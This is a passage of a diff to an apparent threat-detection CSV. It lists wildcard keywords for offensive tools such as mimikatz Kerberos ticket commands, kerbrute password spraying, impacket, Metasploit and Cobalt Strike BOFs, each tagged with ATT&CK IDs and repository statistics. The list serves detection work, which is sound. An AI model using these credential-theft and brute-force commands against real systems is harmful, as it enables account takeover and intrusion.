Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" -"*kerberos::ptt*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::ptt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ptt*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ptt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*kerberos::ptt*.kirbi*","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*kerberos::purge*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::tgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*kerberos-ldap-password-hunter.sh*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*kerberosv5.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*kerbrute -*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerberos::purge*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::tgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kerberos-ldap-password-hunter.sh*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kerberosv5.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kerbrute -*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*kerbrute bruteuser *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*kerbrute passwordspray *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*kerbrute userenum *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*kerbrute userenum *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*kerbrute*bruteforce*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*kerbrute.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*kerbrute/cmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*kerbrute/util*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*kerbrute_*.exe*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*kerbrute_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*kerbrute_linux*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*kerbrute_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*kerbrute_user_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*kerbrute_userpass_wordlist_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*kerbrute_windows*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*KerbruteSession*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*kernel_shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*kernel-exploits*","offensive_tool_keyword","Github Username","github repo name hosting windows kernel exploits","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecWiki/windows-kernel-exploits","1","1","N/A","N/A","10","7472","2852","2021-06-11T23:29:15Z","2017-04-25T04:02:31Z" +"*kerbrute userenum *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute*bruteforce*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute/cmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute/util*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute_*.exe*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_linux*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_user_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_userpass_wordlist_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_windows*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*KerbruteSession*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kernel_shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 